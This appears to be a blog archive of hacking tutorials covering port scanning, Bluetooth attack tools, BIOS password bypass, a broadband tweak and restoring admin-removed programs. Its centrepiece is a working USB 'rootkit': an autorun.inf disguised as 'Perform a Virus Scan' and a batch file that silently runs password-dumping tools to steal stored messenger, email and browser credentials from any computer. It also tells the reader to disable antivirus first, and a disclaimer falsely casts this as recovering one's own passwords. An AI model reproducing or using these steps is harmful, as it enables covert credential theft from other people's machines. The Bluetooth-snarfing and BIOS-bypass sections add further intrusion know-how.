Archive of ‘Tutorials’ category

Find a Port to Hack

What is a port scanner?

A port scanner is a handy tool that scans a computer looking for active ports. With this utility, a potential “hacker” can figure out what services are available on a targeted computer from the responses the port scanner receives. Take a look at the list below for reference.
Starting Scan.

Target Host: http://www.yourcompany.com
TCP Port :7 (echo)
TCP Port :9 (discard)
TCP Port :13 (daytime)
TCP Port :19 (chargen)
TCP Port :21 (ftp)
TCP Port :23 (telnet)
TCP Port :25 (smtp)
TCP Port :37 (time)
TCP Port :53 (domain)
TCP Port :79 (finger)
TCP Port :80 (www)
TCP Port :110 (pop)
TCP Port :111 (sunrpc)
Finished.

Scanning for open ports is done in two ways. The first is to scan a single IP address for open ports. The second is to scan
a range of IP address to find open ports.

Try to think about this like calling a single phone-number of say 555-4321 and asking for every extension available. In relation to scanning, the phone-number is equivalent to the IP address and the extensions to open ports.

Scanning a range of IP address is like calling every number between 555-0000 to 555-9999 and asking for every extension available at every number.

Hacking Bluetooth Devices

If you are planning to gain a deeper understanding of Bluetooth security, you will need a good set of tools with which to work. By familiarizing yourself with the following tools, you will not only gain a knowledge of the vulnerabilities inherent in Bluetooth-enabled devices, but you will also get a glimpse at how an attacker might exploit them.

This hack highlights the essential tools, mostly for the Linux platform, that can be used to search out and hack Bluetooth-enabled devices.

Discovering Bluetooth Devices

BlueScanner – BlueScanner searches out for Bluetooth-enabled devices. It will try to extract as much information as possible for each newly discovered device.

BlueSniff – BlueSniff is a GUI-based utility for finding discoverable and hidden Bluetooth-enabled devices.

BTBrowser – Bluetooth Browser is a J2ME application that can Browse and explore the technical specification of surrounding Bluetooth-enabled devices. You can browse device information and all supported profiles and service records of each device. BTBrowser works on phones that supports JSR-82 – the Java Bluetooth specification.

BTCrawler -BTCrawler is a scanner for Windows Mobile based devices. It scans for other devices in range and performs service query. It implements the BlueJacking and BlueSnarfing attacks.

Hacking Bluetooth Devices

BlueBugger -BlueBugger exploits the BlueBug vulnerability. BlueBug is the name of a set of Bluetooth security holes found in some Bluetooth-enabled mobile phones. By exploiting those vulnerabilities, one can gain an unauthorized access to the phone-book, calls lists and other private information.

CIHWB – Can I Hack With Bluetooth (CIHWB) is a Bluetooth security auditing framework for Windows Mobile 2005. Currently it only support some Bluetooth exploits and tools like BlueSnarf, BlueJack, and some DoS attacks. Should work on any PocketPC with the Microsoft Bluetooth stack.

Bluediving – Bluediving is a Bluetooth penetration testing suite. It implements attacks like Bluebug, BlueSnarf, BlueSnarf++, BlueSmack, has features such as Bluetooth address spoofing, an AT and a RFCOMM socket shell and implements tools like carwhisperer, bss, L2CAP packetgenerator, L2CAP connection resetter, RFCOMM scanner and greenplaque scanning mode.

Transient Bluetooth Environment Auditor – T-BEAR is a security-auditing platform for Bluetooth-enabled devices. The platform consists of Bluetooth discovery tools, sniffing tools and various cracking tools.

Bluesnarfer – Bluesnarfer will download the phone-book of any mobile device vulnerable to Bluesnarfing. Bluesnarfing is a serious security flow discovered in several Bluetooth-enabled mobile phones. If a mobile phone is vulnerable, it is possible to connect to the phone without alerting the owner, and gain access to restricted portions of the stored data.

BTcrack – BTCrack is a Bluetooth Pass phrase (PIN) cracking tool. BTCrack aims to reconstruct the Passkey and the Link key from captured Pairing exchanges.

Blooover II – Blooover II is a J2ME-based auditing tool. It is intended to serve as an auditing tool to check whether a mobile phone is vulnerable.

BlueTest – BlueTest is a Perl script designed to do data extraction from vulnerable Bluetooth-enabled devices.

BTAudit – BTAudit is a set of programs and scripts for auditing Bluetooth-enabled devices.

I have not familiar with all of these tools, not even half of them tell you the truth, but if you need to know where to download any of these tools either message me or google them. If you need an explanation on how one works or how to make it work, message me with any question you need to ask, ill tell you from what i know and i will research it and give you the best explanation possible.

How to Bypass BIOS Password?

This depends on what BIOS the machine has. Common BIOS’s include AMI, Award, IBM and Phoenix. Numerous other BIOS’s do exist, but these are the most common.

Some BIOS’s allow you to require a password be entered before the system will boot. Some BIOS’s allow you to require a password to be entered before the BIOS setup may be accessed.

Every BIOS must store this password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the password. You must know the memory address where the password is stored, and the format in which the password is stored. Or, you must have a program that knows these things.

The most common BIOS password attack programs are for Ami BIOS. Some password attack programs will return the AMI BIOS password in plain text, some will return it in ASCII codes, some will return it in scan codes. This appears to be dependent not just on the password attacker, but also on the version of Ami BIOS.

To obtain Ami BIOS password attackers, ftp to oak.oakland.edu/simtel/msdos/sysutil/.

If you cannot access the machine after if has been powered up, it is still possible to get past the password. The password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.

On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery.

Get Passwords Using USB Drive

Have you ever imagine that the pen drive or flashdrive you are using for data transfers can be a hacking device?

There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here are the procedures in creating the password hacking toolkit.

NOTE: Please disable any antivirus software before doing this.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
Code:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

Code:
start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

NOTE: The author is not responsible to any damages you might faced in using this tool. The main objective of this tutorial is to help you guys recover lost passwords in your computer machine.

How to Increase your BroadBand Speed?

Increase your Broadband Speed

A Simple Tweak (XP Pro only) which will increase your Broadband Speed.

Make sure you Log on as Administrator, not as a user with Administrator privileges.

Follow the steps as given below-

1) Click on Start Button.

2) Select Run From Start Menu.

3) Type gpedit.msc

4) Expand the [Administrative Templates] branch.

5) Then Expand the [Network] branch.

6) Highlight(Select by Single Click) [QoS Packet Scheduler]

7) Double-click [Limit Reservable Bandwidth] (Available in Right Side Panel)

Cool Check(Select By Single Click on it) [Enabled]

9) Change [Bandwidth limit %] to 0 %

10) Click [OK] Button.

11) Restart Your PC.

12) Now Check Your Broadband Speed.

Restoring removed programs in start menu

How can I get back all those nice programs that they removed from my start menu?

This is also quite easy. There is a program called groupconv.exe . By running this, you’ll restore the default star menu along with all the usual programs and accessories. Useful if the Admin has removed some program that you prefer or want to use like Paint brush. You’ll need paint to pull off the next trick.

1 4 5 6 7 8 13

Content Protected Using Blog Protector By: PcDrome. & GeekyCube.